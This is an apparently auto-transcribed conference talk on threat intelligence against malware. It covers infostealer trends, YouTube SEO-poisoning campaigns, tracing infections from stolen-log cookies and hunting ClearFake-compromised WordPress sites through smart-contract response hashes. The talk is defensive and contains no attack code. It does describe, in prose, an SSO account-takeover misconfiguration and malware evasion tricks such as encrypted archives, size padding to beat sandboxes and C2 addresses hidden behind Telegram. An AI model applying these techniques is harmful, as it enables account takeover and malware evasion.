Threat Intelligence Strategies Against Malware

so how has the day been for you guys are you excited for the presentation or are you bored till now excited right so let's begin with our presentation threal strategies against malw threats so before we even jump into our introduction let's see how many of you guys are actually working professionals oh wow I expected a lot more but it's fine and how many of you are students yes there are a couple of students too so if you are students some of the concepts and the words itself will be too complex for you I'll say keep your phone ready Google it and then note it down also if you like and then that's how we we'll keep it very interactive uh

I mean in in the sense we'll be presenting a lot of case studies explaining what we did and let's jump in so I am pan Karthik I'm a threat researcher at Cloud so I've just graduated last year and then it's been one year of full-time experience for me and then I do a lot of malare research uh not reverse engineering kind of guy but I do malare research at the end of the presentation you'll know what kind of research I do and I also do crq so at cloudsec we are building something new so I'm learning uh cyberis quantification and apart from that threat and till that's the main role I'm like even my name contains and I do a

lot of automation for a security professional I feel all of you might have a coding I mean you might be have a coding phobia also so I'm also that kind of a guy whenever I do coding I I use a lot of chat GPT and stack Overflow who doesn't right and then abishek hello I am abishek so I do work at cloudsec I specialize in O and human so this is a just disclaimer for corporate folks so whatever we show here right it's not a straightforward solution whatever you guys are implementing right now if you're in sock role or if you're in a malware research role so this will help you do a research in a very UNC unconventional way and

then to fully benefit from it you have to go back home check what we have presented and then do more research about it only then you'll get the full experience out of this and then like right now uh most of you would have known about IBM cyber threat report which has released very recently right so according to IBM right 70% increase of usage of stolen credentials so like in 2023 there was a little use of stolen credentials were still there but 70% got increased now and then out of these all hackers right 32% of the people who were involved in ransomware activity they preferred stealing and selling the credential instead of doing ransomware activities that's crazy right they're

moving away from Ransom because there are a lot of policies which companies are implementing even if they get attacked they have fail saves to get back up and then ransomwares so that's why they're moving away from that and then the last one is like straight out crazy because 266 per of absur in usage of infos Steelers have you guys all heard of infos stealer or simple word virus virus which steal your password is a info stealer and then the number of families like the number of strains of malware like the number of types of malware is 97 families so there are 97 types of malwares and then every strain has a different variant of it again so it's

like your code only if you have a Chrome OS right sorry Chrome uh browser right it'll have different versions of it right similar to that it'll also have a different versions of it and then there are multiple families of the same malware and then this is one more screenshot from the same IBM report uh here you can see from last year which was at 16% it risen by 14% in this year which is basically usage of valid accounts so valid accounts for a cyber uh criminal activity to be done they need a initial access right so how do they get the initial access you when when you when you do VAP you try to search

for uh exploitable public applications so that is in the third place which is a are 29% there are other two which are above them which is fishing and valid accounts so how do they get valid accounts because of the malves malves Steal the information and if they find them valid they will be utilized in cyber ATT cyber criminal activities and then there is fishing fishing was reduced actually from 41% to 30% you'll understand more in this slide so this is uh basically how much uh how how malware spread right these are called initial infection vectors uh it's basically like how the malare was delivered to you malver vertisements one basically you see ads everywhere else right you might

have been seeing so my dad sees uh Facebook ads by Mukesh Amani to invest in some stocks so this is a kind of Mal advertisement only right and then so in from Q2 2023 it was like it's a straight line up it's like 250% increase in malvertising so what does that mean every Google search you do I mean every day you do you use Google right every Google search you do if you're searching which for anything free there is a slight chance that what you find is malware so that's how the q1 20124 it's 79% of the whole malware delivered is from Mal vertisements Mal spam all these are like almost kind of not helpful for cyber

criminals because Mal spam every organization has their own fishing uh like fishing detection tools and they also give a lot of employee employee uh training so that also gets prevented so now we know what are the infection vectors and then the top 10 malware which got like in the last quarter so so golish is one I mean if you ask me to speak I can speak ours about s goish but it's a simple malware which is a browser based one it uses Java script injection so think about it as uh malware using your browser to hack another website itself so it's basically trying to Brute Force other WordPress sites but how do they brute force it for every Brute

Force attack there is rate limiting which you can do right if you rate limit from that IP it's preventing do DOS or actually dos you can't brute force or use the same different passwords there's a certain limit for that but so every person who opens a compromis site like any WordPress site it tries it uses your browser's network to basically send uh like root Force request to other sites so that it's like a chain one site gets compromised and until that owner of that site uses and comes to know that his site got compromised he'll they'll keep trying to hack other WordPress sites so do any of you know that WordPress has a vulnerability of user enumeration anyone

knows you know you guys know right so WordPress that user enumeration gives them username like you might have so I came from a CTF background so the first box which I did was something related to Mr Robot so that Mr Robot box also had something similar to that he got a he he needs to get a username once he gets a username then he tries to get a password so s golish is one type of malware which does that and then what do they drop they drop anything from a normal adbot to a ransomware so it's that crazy 60% of it is just a dropper so dropper is basically it's like giving the payload and goes and then there are lot of anti-

detect mechanisms so a lot of EDR 6dr might know this word so if you upload a malware in virus total or any avash or something like that it'll detected if it is malicious or not right but these people even though they detect as malicious they won't actually get the final sample which it is supposed to execute because it has coding break points which will be set like if it it it checks if there is specific uh let's say windows policy enabled don't execute because they they have a higher chance of getting detected the higher chance of if if it gets detected uh all the researchers will write rules to prevent that same sample from getting executed

so they have a lot of such fail saves also and then you know one interesting thing they they use uh all of you would have known uh C2 right C2 infrastructure so they use uh steam telegram you have your uh own usernames right they inject or I mean they just give their IP addresses there and then whenever the malware executes it doesn't reach directly to the IP it checks team it checks Telegram and in that telegram the IP address is actual uh malicious IP address is there so basically if uh that actual C2 is taken down that telegram account is still there that telegram account can change its names so in that way they use fail safe c2s also and then

that are all the tactics and then these are all some malwares so coin minor is mining software mining malware and then nanocore is one of a bot net botn net is used for DS again and then a lot of other Steelers and then now you know that what's happening in the actual threat landscape right it's full of malware how do you protect from your from these there are a lot of actual Solutions provided for your organizations like xdr EDR you have your own sock teams which keeps monitoring all these stuff but I feel like most of the time it will be reactive some do proactive I'm not saying no one does proactive there is proactive but most of this presentation

is to uh basically urge you to move to proactive research now coming to cyber threat deligence uh how how many of you know how many types of cyber trental are there anyone okay there are two types one is internal CTI internal CTI is basically uh let's say you have a firewall how will a firewall detect if there is an anomalous Behavior or not very simple the you you guys know about Bangladesh bank heist how how did that happen in the off time there were loin attempts so internal CTI detects there were offtime login attempts and marks it as anomalous Behavior so you have access to all your internal Telemetry at one point you might have heard of seam and saw

solutions they pull in all the data and you get insights out of it so that is internal CTI and then detection of Insider threats I've heard uh the previous speaker speaking about Insider threats so here how do they detect Insider threats how does internal CTI detect Insider threats any idea like what would an Insider like to do he wants the juicy information he wants the Trade Secrets all these things right so how does he get all these there are certain parts of any company's infrastructure which is very restricted right if any request goes into that that all should be monitored if there is any like malicious or anomalous activity which is out of line that gives you

these kind of information so basically having seams or uh xdr EDR all these sets a baseline for you to say this is how it normally is if it deviates from this format or from this patterns just alert me so those are the anomalies and that's how internal CTI finds out there is upcoming threat it's it's basically predicting that you will be attacked and then finally misconfigurations and vulnerabilities you have whole list of uh I think there is something called s bomb so each and every application which you build will have that as bomb you know versions of each and every application which you internally use so with those you can try to find out misconfigurations and

vulnerabilities common misconfigurations so a very simple example uh there was one uh Microsoft uh SSO Bypass or bypass do anyone know about that like it's a very simple bug you can basically sign in as any User it's not even a bug it's a feature which they implemented anyone knows so there are two types of email ID in Microsoft's uh like ad active directory so one is the principal ID so principal ID is that unchangeable thing it's immutable even if you have ad admin access you can't change it then the second one it's the actual email like you can give your personal email you can give your work email any email so what did some companies who implemented SSO

login do instead of using this principal ID they used uh this specific uh like the interchange able one so what happened for anyone to hack any or sign in as anyone so what they did they basically create a their own active directory they give the email as whom they want to who whose account they want to take over and then they finally will be able to take over if they sign in using their Microsoft account so you can check it check about it it's not my research someone published I found out that uh misconfiguration was there and I I checked it for other people and then it worked and that is how like it's basically that if you have this

vulnerability there is a chance that this can happen basically before even the bug Bounty people or criminals do that you'll find it out and then coming to uh like it's all uh Theory I'll just skip it out so the next one is external CTI what is external CTI so basically we operate in this area we help companies who are internal like who are for internal sock teams we provide data uh I mean I'll not make it a sales pitch also they they strictly told it shouldn't be a sales switch so I'll not speak about any of my product or my company's products so external CTI is basically let's say your company has a view of your own

environment you know what all is happening inside but for you to know what is happening outside it's a very hard job let's say you want to scrape the whole internet can you alone do it like even if your company has money they need to invest time they need to invest resources all these things should be there and only if it clicks your own external CTI will be there but there are other vendors who give you external CTI resources who tracks threat actors and then even if you have a specific Tech stack they try to give you relevant threat Intel which is like if let's say WordPress new WordPress vulnerability has released and you use WordPress they

alert you those kind of information CTI does and they also track uh techniques tactics and procedures so they are called ttps so they track all these ttps of all the threat actors whoever is active on dark web forums Etc AP groups all these so they monitor how they act so I I'll give you a pretty simple example there was this uh guy called Shopify guy so what does he use for his like he's a cyber criminal what does he use as his initial access the name itself says right Shopify guy he uses Shopify and then he steals data and he sells it so it's this is very simple but most of the threat actors will have that

LE ified usernames and all so you'll need to check what all tactics they use when they infiltrate your systems like you'll have honey pots honey pots actually detect these kind of anomalies and that will help you in future investigations and then practice proactive defense so this is having basically having honey pots having that red team blue team activities so this will help you to uh understand how to act when there is actual cyber threat and then finally the threat landscape is always changing internally it is very hard to monitor but externally vendors who provide external CTI are able to do this and then as my presentation itself is about malware we'll just cover what is uh like external and internal in

terms of malware so the source of external CTI it's gathered from outside the network so it could be from other company's Telemetry which is provided by your xdr ADR and then there are a lot of sources like malware Bazar uh there is Mal pedia all these gives samples for a specific strain of malware and then internal CTI so these are any anomalous detections like you have agent sitting in each of your systems right so these are generated within your network and then data so external CTI is Mal sample indicators of compromise there is threat actor profiles ttps all all all what they do and then for internal CTI it's security alerts which is generated and

moved to your seam and then there is logs malware analysis results so all these things are considered to be internal CTI and then purpose external CTI is a early warning even if you are not vulnerable it'll warn you that you have this T stack do something to protect it and then for internal it is basically after a incident happens you need to detect like it's part of detection investigation containment and then remediation and then finally example for this I think I've already covered so for external it is threat feed Wars of a new ransomware so basically there will be feeds which says uh there is lock bit who is targeting banking sector now so now you'll know

that oh okay I need to see what lock bit is doing I'll need to see if the same things are there for me or not a very simple example guys so ransomware group last year there was Klo rans somewhere so Klo what they used to do was there was something called move it as a vulnerability every single so once move it got released every single activity of theirs was tied back to move it so if you had move it you are vulnerable and then once you're I mean I don't even know why nearly 200 companies got compromised because of Klo so external CTI helps you in that that kind of things and then internal CTI ideas Flags a malware download and

then it basically investigation ensures so malware download I don't know how people download malware and corporate environment even I when I do malware research so just a uh disclaimer I got compromised when I was in college I used to play a lot of games I used to download pirated games uh please don't record this and put it anywhere but I got compromised I when did I know that so there is no company which actually provides individual dark web monitoring but Google they have that gmany Pro which got released and I purchased that so then I came to know that they have this feature called Dark web monitoring and then it showed that I got compromised by infos malare only like

back when I was in college I didn't know about all of these things but then those kind of detections I didn't have any antivirus even if I add antivirus the the game only tells turn off your antivirus otherwise your game is not installed so people do that and then I've seen it a lot of times in actual corporate environments so those kind of things IDs you can't turn it off your IDs has the admin privileges so IDs will flag those and then you'll basically train them again saying why do you do this do it in your own personal systems and even if you do it in your personal system your corporate credentials shouldn't be stored in your personal

system so those are actually the things which happen so those are the things which are discussing and then now let's discuss the real stuff all the case studies which we did and then how the malware tactics we researched about so the things to cover so first step how malves deliver is using SEO poisoning as discussed so I'll show you how we detected uh a huge campaign in YouTube how we stopped it also with collaboration from our International agency and then the second one is tracing the Mal locks for source of infections now all these infos Stealers right they sell those information even if you get those information you still need to understand how did they get

compromised that will help you to prevent such things from happening again so that also we'll see and then there is one more research clear fig so this was one malare strain research by seoa we did some more investigation on top of that which led us to some good findings that also we'll be presenting and finally abishek will be presenting about human-driven research how it helped us crack a big uh TTP which malware was executing and then finally we'll see how dark web research will help you in U like Fast tracking your research so so SEO poisoning it's just simple you can see the screenshot where uh like some videos have been posted so this is a AI generated video and this is

for Photoshop here you can see the name also and then some premium proof software and then all of these have like 5,000 views 3,000 views 4,000 views and then which channels we posted this it's not actually new channels see some suar with prti I don't know Hindi but so this seems to be actual legit Channel and then Dakar media so it is also some foreign Channel and MMA talk so MMA is that fighting organization I guess so all these channels how did they get compromised there was one campaign which was happening just to compromise YouTube channels and use that YouTube channels to post videos so that was how they initially targeted SE so when you post

YouTube videos and have specific keywords anyone from uh marketing team here no one okay so basically they have have tags and all they put a lot of tags in the video description right so they use that for seo seo and then how what why is it called SEO poisoning they poison the actual results so when you search for Adobe it should adobe.com should be first not a malware right so they do SEO poisoning and there was one situation where actually a malicious site was on top of Ari imagine how critical is that lot of people who are I mean overaged or who who doesn't know Tech they click on the first one we they see and if the first one doesn't work

second one third one fourth one all of them are malvas they get infected multiple times so that's how SEO poisoning is and the statistics of it right for YouTube so in approximately 2 months we track nearly three lakh videos get getting posted so three lakh videos is a huge number and from those three lakh videos there were 800 unique Mala samples which got detected and then out of some 10 malware variants so even in that 3 800 samples only 10% of them got actually detected by a Sandbox so that means there are 90% of them which escaped the I mean escaped in the sense they they prevented detection at all but they are still malvas how do I know

because I use very specific keywords to track them so let's say YouTube was there so in the back previous slide you can see the keywords are free download adob Photoshop free download no crack illegal illegal and some some keywords like that what did I do I use YouTube search search for that specific keywords you know Google ding right use Google doing and using that keywords you'll able to get all the videos itself and then you might say there might be false positives but who gives you free free stuff away for free and even if it is free stuff they take it down because it's a actual premium software right so that's how it was and in 2

months it gathered nearly one CR views in one CR our views let's be very optimistic let's say only one not even one lakh let's say 10,000 people saw it and then 10,000 I mean one CR views is everyone saw it but only let's say 10,000 people downloaded it and then installed it even that 10,000 is enough for them why YouTube accounts in that 10,000 how many will be there 100 more and then all of these it's like a domino effect you get infection there is reinfection and then they compromise YouTube accounts you uh Gmail everything whatever accounts you have passwords for all of that all of them gets compromised until the user actually notices them and

then they use to run their operations again so their investment is giving them back and it's rotating again and again again again and yeah this is one more one so I just St free antivirus crack download aast without aast and without YouTube interestingly you see LinkedIn here LinkedIn is supposed to be professional but yeah linkedin's when when when someone's LinkedIn accounts get compromised that also gets involved in SEO poisoning so that is one and then there are other websites which actually are malicious but they are not abusing any service they're just putting out websites everyone can put out a website and then they still use SEO to get that on top of everyone else so now tracking SEO poisoning so

how do you track this now you know what is SEO poisoning how do you track this so first step there are two paths Source abuse source source abuse is easy to track how do I uh I mean why do I say that YouTube has its own apis where you can use that every day it gives you 10,000 free searches so using that you can track what all videos were posted and you can do all your coding stuff to process that and I mean this part is I I told it is easy but I mean to prevent detection they can go to any extremes also so you need to understand what patterns they use and you know once you click on a website

or any link on or any AD also you get redirected multiple times in a span of seconds why does it happen so that I mean I'll I'll try I'll tell you one thing you go go and try it out at home so Google when you use Google browser there's something called safe browsing it shows a deceptive site ahead think about it when before you go forward right so when you see that screen actually what happens in the back end is every every single request your history gets sent to Google so that history part there is a certain amount of limit and that redirects are to prevent that final site which actually serves the malware to get uh like to be

undetected basically and then there is individual links those other sites which I showed right individual websites those are kind of hard but still it can be it can be detected and then you just look over Source by Source I did YouTube you guys take can take up other sources I'll give you examples also get iub is getting abused SoundCloud is getting abused Docker Hub is getting abused all of these things what do they do whenever you post create a repository in GitHub or create a let's say image in Docker it gets indexed on Google for people to search for it and when people search for keyword like adob free crack download these things will come up so that is

Source by Source uses use the sources apis or use something called custom search engine so to crawl internet you you need not create multiple uh like you need not know how how the web crawling works and all you can just use apis they have their own documentation you can use them but these are not free you'll have to invest some money in it but it's not they give free trial also Google basically and then this is Google search engine you can give sites to search sites to exclude a lot of things and basically you can it's a programmed search engine you can give a specific search query number of queries you want to crawl all these

things you can customize and that's how Us and YouTube also has that same search API search list so all these have API Cas it's not directly free but you can still use them and basically because of that YouTube search API I got this so This I mean here I'm not sure if you are able to see there are 347 videos in one crawl that to for how many days just for one day I mean I run I used to run the same script four times a day and every time I used to get 500 600 videos at one certain point of time so it was daily 2,000 videos malicious videos all promoting I mean you can see patterns

also there using that uh same so here you can see two different videos with the same name so all these are again like from different channels again so that's how search API gives you data so this data so how does how how do you even consume this data you get you get malicious video URLs initial drops from the description I mean in the video I don't I don't think I've shown a description but in description they used to have a link only when you click on that link that malware gets downloaded so those links you get and then when when you follow the trail like once you click on the link where does it redirect

how does it from where does it actually download the sample it's not from their own server they are so I mean intelligent they use media fire they use Google Drive they use dropbox all these free file serving services and they use encrypt they they actually give it as encrypted Zips so why do you use encryption encryption is basically uh it's like when you upload something into virus total right unless until it is actually a exe it will not run it and do Dynamic analysis and all if you give them an encrypted zip they won't know the password so a initial detection will be like swayed away only after you decrypt it like using the password in

the description itself the any antivirus or they check they come in but again so those samples or 10 MB archive when you extract it it becomes a 800 MP executable how they just put in junk so that all these there is a limit of how much you can upload to sandbox also like 250 MB something like that so they make it very big so that even uh so download is easy but execution is also easy and then there is a anti- detect mechanism which they're using too and then finally if you do reverse engineering and if sandbox works properly you get C2 servers and then all the other malware indicators so how do you use use this

stuff like I don't talk about ioc here you also know how to use ioc's you just put it into the EDR and it works but how does malicious video URLs help you or how does initial drop URLs help you so it's a list of URLs right and you have content blocking Network like content filtering in your firewalls itself you give the list of all these to your content filtering and it'll straightforward block it so one uh like suggestion here when you say YouTube is getting abused use you can't completely ban YouTube from your internal firewall Network right people still use YouTube to watch some educational videos or something but I saw this new feature in

basically Edge Microsoft Edge where you can block a very specific URL like if you go to mimic ads the some it's it's a uh red teaming tool in GitHub when you go to mimic ads edge blocks it but you visit any other GitHub repository it still let you view it right so that level of like it's very granular uh content filtering which you need to have that will help you a lot and the second one basically once you get I I was telling malware logs are uh being sold right so from those you can still uh find out how the user got infected one thing is browser history from browser history you know what he

downloaded from cookies you know cookies are stored hierarchy right you visit Google you visit YouTube all those visited sites it it gets layered top on on top of of each other like a stack and when malwares exfiltrate they exfiltrate in the same way so when you are trying to detect how did someone get compromised you look at every at end of the like infection cookie sorry not infection cookie the exfiltrated cookies and you'll find out actual malicious websites which are present and then search for pirated content like search for software soft search for cracks all these things and you'll actually find uh helpful stuff to detect how the infection happened and this is how a log looks like here

you can see Google Chrome's autofills are exfiltrated and these are two strains of malware but here you can see autofills cookies file Grabber so you can see some internal document docx code.txt important autofills passwords process list user information so all this information it's it basically creates a user fingerprint like do you think if you give me uh sorry if I give you my G email username and password you can directly get in no right Google has certain measures of stopping you from even signing in because they have MFA 2fa browser fingerprinting like you have signed in from a new device just sign in again all these things they have so these information they take it so that

they have multiple other techniques I'll not dig deeper into them they have techniques to basically even bypass those so the browser fingerprinting is from the user information and then as I told you can look at cookies and then you can see how they got actually infected so this is one cookie example so uh here you can see google.com OK rush.com and then again google.com and then there is something called curent pc.com so this is an actual Malicia site which we noticed earlier and this was the one which was actually serving malware and then finally s cloud. WS so this was the place where the final payload was downloaded from so bu just by analyzing cookies from that specific

log we were able to understand how he got infected so it's basically breadcrumbs left in and threat Intel is basically you investigating it and then combining all the dots and understanding what happened I mean you'll actually feel like Tony Stark in that blast scene he'll he'll redo everything and then he'll see from where the bullet came or who blasted something like that right so he'll actually feel in that way if you actually do the stuff and then finally onetime investigation is fine but we are in a I mean if you're in a service based company you need to do that same thing again and again and again but you know there's a pattern in it right so you can automate everything

and then basically it help you so this is one like enormous project which I took up for tracking all that YouTube campaign all the statistics and all it's it was not anyone's research it was my research I already published the paper about it but I'm just telling how I did it this was this is the first time I'm presenting and you know the parts of it are like in four different parts one is the YouTube scraper you know how the YouTube scraper I've showed you and then I get video URLs video metadata and then unsorted URLs I stored them in a database and then the second one was source of infection detection I'll not showcase any code but you just know how

I did that right you need to automate it and then you basically get the final delivery URLs from it and then basically from there there is one specific module which I wrote the malware sample Hunter so it's a proud name which I've given it to myself and then my my code and then that what it does is basically I told you right when you click on one one website it continuously redirects you to multiple others and sometimes you need to click and there's a lot of redirection which happens so that is basically aiming to solve that redirection issue and actually get that malware downloaded so it's basically a cat and mouse game you find out that

they're using one tactic you go behind them and Sol that and then they'll be in the next step which is implementing a new one to basically go ahead of you right and then basically once that malware samples are downloaded the next step is sandboxing which is basically you have your own sandbox so that when you upload those samples you'll see if it is getting detected or not and then most important step of this in this sandbox you don't you shouldn't use existing sandbox like virus total triage or something like that because when you upload into actual real sources thre actors will know that they're getting tracked even here they somehow found out that they were tracked but they will

know that you are tracking them and then they'll try to like completely move away from that tactic itself so you'll need to covertly do all this investigation it's a mind game in whole you need to understand how they think so that they don't detect that you are doing something so yeah and every day it runs this same script and uh it gets this whole uh s those samples and statis six which I showed and basically as I told before I hate coding but I still do it via help of chat GPT and stuff but recently I found out this very interesting tool called na10 so some people anyone knows this oh wow actually someone knows this

so I'll say this is the best thing which ever happened every Co every small script which I need to write without coding it helps you automate stuff so getting data from sheets how to extract data from Google Sheets that's still hard right you need to go through multiple documentations they have one node like this like one J issue so here it is J issue but there they have multiple other things you can check it out and basically this one it enriches the security incidents how does that how does it do so in jira ticket let's say you have automation which is creating jira ticket to have some hash in it so you check extract IPS and domains uh

from the sample and then you upload it to URL scan you all know URL scan hopefully if you don't know just look it out okay and then there is virus total both of these you upload the domains and you get both the reports you merge the reports and then you basically update that ticket so this is common data enrichment I mean the computer science students might know data enrichment is a keyword they use in data science so it's something like that and then this is a very simple one but this whole workflow which I showed can be implemented in that you just need to understand what all features are available in that and the next one uh clear fake

campaign so this was I mean the blog isn't actually loading but this was actual research published by seoa I can share the blog details later but the research what they did was this is a whole attack chain which they actually use they compromise WordPress sites and then they use all this JavaScript Eng ction they use Smart contracts they're before us like actually do you guys use any websites which Implement smart contracts no but the attackers are very forward they they already use Smart contracts to store their infrastructure and stuff and then finally deliver the malware so now in their blog what intrigued me was these three entries so if you have that these are URL patterns

basically if you give these URL patterns in url scan you'll understand the middle intermediate domain which is actually uh redirecting and all these so these are huris stic bits URL patterns if you you can upload it into your uh seam and then if if it notices any patterns like this it'll alert you but for me it was I want these compromise WordPress sites why because I'll know what sites are there and then I'll even prevent users from visiting those sites so how did I go ahead and research so here you can see there is a chrome fake Chrome page F Chrome update page when people go ahead and download and install it's a malware they get affected

and it's done they the whole whatever ransomware info stealer all these samples get in uh they can execute now this is how URL scan looks now here they have something called HTTP so when you visit a website it's not one request and one response right a lot happens in the back end number of request to get images etc etc right so you can track the same thing like this so in those HTTP transactions which you can see in uh URL scan so this the the thing the whole thing was I was talking about Telegram and steam getting abused right so similar to that smart contracts there is one simple function which stores information and when someone

calls that smart contract it gives out that information so I'm not I'm not sure how many of you know about smart contracts if I speak about SM smart contracts a lot it'll take up the time but if a smart contract is called it's just a request then they get a response saying this is the information what you want and what is that information it's actually a malicious JavaScript which gets injected so that's how it is and here you can see this whole binance do data seed if it is visible so binance they act you need to actually visit it's a SAS kind of thing when you call that contract it gives you a 4 KB of a

malicious JavaScript it gets executed and then all these uh the heuristic based URL comes here but before that how do you get to know even this call contract is contracts are getting called right so they have a very special feature when you get the hash of the response you can search based on the hash so here you can see I've searched this hash and found out nearly 7,000 websites having the same hash so what does that mean so that specific hash is a contract call and that is just 41 K not excuse me so that is just 41 bytes I think it's so here I I I think you'll get the slides later so you can later look at

the URL all the things which I did so there is one specific post request which got a response of 41 bytes so those 41 bytes is like a initiation so you know how https works right there is some three a handshake so in that first handshake it acknowledges that yeah I live just send your public certificate so similar to that smart contract also has that 41 bytes saying this is how it is here you go now when I get the URL hash and then one yeah so this is the hash of that 31 bytes and then these are all the websites which actually Implement that now where do you expect uh smart contracts to be used in crypto

websites crypto platforms all these things but you can see there is kimc cartoon. vent. Land anad Design studio.com why do I mean the I even though there was a crypto boom I don't think everyone uses smart contracts right so here the issue was that smart contract was actually a malicious call to fetch in infected JavaScript and then I came to know about it so this one will contains false positives because there are actually legitimate crypto websites which use Smart contract but you can filter out by looking at this so you combine this initial tactic which I showed using that hash and you use that heuristic based approach which actually they

shared this one the combining both of those you can remove false positives also and yeah so this is one of the one which actually URL can capture the screenshot later on they implemented measures so that even if URL can captures it will not get detected but even we still because of this 13 41 by hash you still able to find out websites which are actually compromised and basically because of that uh I got I I so there is automation for this again I'll not deep dive into that but you I got all those 7,000 websites from that I filtered out the responses and then I processed them and then now you can see what are all the

sites which got compromised like YouTube downloader Zoom line Network all these and then the URL scan results and then the domain out of it so and then later uh basically in a smart contract there is it's something like your transactions only you give money it updates the data inside so think of it as a database and then when you call that database it gives you information smart contract this smart contract was something like that and for you to update the database you have to pay gas so gas has something like a transaction fee for them and that is how they found it like they they use it also and then for each and every JavaScript

it is obfuscated obviously and you know I mean even though it was sub fiscated how how do you decate any any thoughts how do you decate to JavaScript okay so there is you search for JavaScript doation tools the first one was the one which they used and it's very simple you get the code you de skate you get the malicious URL so here in the third column it is the whole malicious infrastructure which I got and then this is bonus code if you want to take photos you can take so this is for scanning the URL scan so I gave the parameter which is the hash and I basically found out all the results and

stored in a output file so this is what it does and the second one is uh basically binance didn't have any apis to crawl the transactions so what I did I downloaded all the htmls so it's a simple crawling chat GPT will help you uh I can't show that screenshot because I didn't find that screenshot actually of my chat GPT where I asked for the code but this is given by that only like who can write this good code because with it has all the documentation and all what each line of code does so it was given by chat gbt and you know here you can see transaction htmls from each transaction HTML I extracted the

transaction Ash and transaction ID from there I was able to to get the JavaScript out of it so here I write it into a response. txt and store it in one separate folder again and then I I'll not hopefully everyone took a screenshot of it or if you want and finally in that transaction files uh there is some specific input called raw soup. this do have you guys heard of beautiful soup yeah it's for crawling right so using beautiful soup I got a ID specific ID called raw input so that is the input which is actually the JavaScript malicious JavaScript I got all the javascripts and then uh I'll not bug you more about the same thing

but you you go through the investigation which seoa did you will be able to decate the JavaScript and get actual domains out of it and that's how I was able to get 579 more infected domains which contained 95 plus actual malicious javascripts so it was basically 95 transactions and four four plus malicious smart contracts so four contracts were basically used to run their infrastructure and then basically I processed that 7,800 results uh on like it on today I mean on the current day uh you get that hash right I that hash you can still run the investigation just before the presentation also I have checked it's the campaign is still running but not clear fake it's some

other campaign that clear fake malware campaign switched to a adware campaign and I don't know what it has switch to now but you can still investigate and then it's still happening and takeway still now use apis or scripts wherever possible to enrich your information or get information I've given you some samples so whatever ideas you have got brainstorm more you'll get apis and scripts to do something like that and don't always rely on what something you find in GitHub we are way past the GitHub area we are not script kides we are chat gbt KES so you need to use chat GPT to write code and basically understand the process of how the malware is delivered so that lets you

actually understand the whole process and track them indefinitely and all the data found by automations are inestable it can be going into seam firewalls and content F filtering systems so that was it